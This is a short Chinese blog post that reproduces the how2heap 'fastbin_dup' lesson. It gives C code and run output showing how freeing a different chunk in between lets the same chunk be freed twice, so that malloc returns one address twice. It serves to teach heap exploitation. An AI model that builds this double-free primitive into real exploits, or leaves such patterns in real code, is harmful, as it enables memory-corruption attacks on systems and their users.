标签:
how2heap 2:fastbin_dup
该代码阐述了针对fastbin的简单的double-free攻击
示例代码:
#include <stdio.h>
#include <stdlib.h>
int main()
{
printf("This file demonstrates a simple double-free attack with fastbins.\n");
printf("Allocating 3 buffers.\n");
int *a = malloc(8);
int *b = malloc(8);
int *c = malloc(8);
printf("1st malloc(8): %p\n", a);
printf("2nd malloc(8): %p\n", b);
printf("3rd malloc(8): %p\n", c);
printf("Freeing the first one...\n");
free(a);
printf("If we free %p again, things will crash because %p is at the top of the free list.\n", a, a);
// free(a);
printf("So, instead, we‘ll free %p.\n", b);
free(b);
printf("Now, we can free %p again, since it‘s not the head of the free list.\n", a);
free(a);
printf("Now the free list has [ %p, %p, %p ]. If we malloc 3 times, we‘ll get %p twice!\n", a, b, a, a);
printf("1st malloc(8): %p\n", malloc(8));
printf("2nd malloc(8): %p\n", malloc(8));
printf("3rd malloc(8): %p\n", malloc(8));
}
运行结果
junmoxiao@sky /m/p/H/资/how2heap-master> ./fastbin_dup
This file demonstrates a simple double-free attack with fastbins.
Allocating 3 buffers.
1st malloc(8): 0x11c0010
2nd malloc(8): 0x11c0030
3rd malloc(8): 0x11c0050
Freeing the first one...
If we free 0x11c0010 again, things will crash because 0x11c0010 is at the top of the free list.
So, instead, we‘ll free 0x11c0030.
Now, we can free 0x11c0010 again, since it‘s not the head of the free list.
Now the free list has [ 0x11c0010, 0x11c0030, 0x11c0010 ]. If we malloc 3 times, we‘ll get 0x11c0010 twice!
1st malloc(8): 0x11c0010
2nd malloc(8): 0x11c0030
3rd malloc(8): 0x11c0010
---------------------------
总结
1 不能直接释放fastbin freelist顶端的chunk
标签:
原文地址:http://www.cnblogs.com/junmoxiao/p/5353190.html
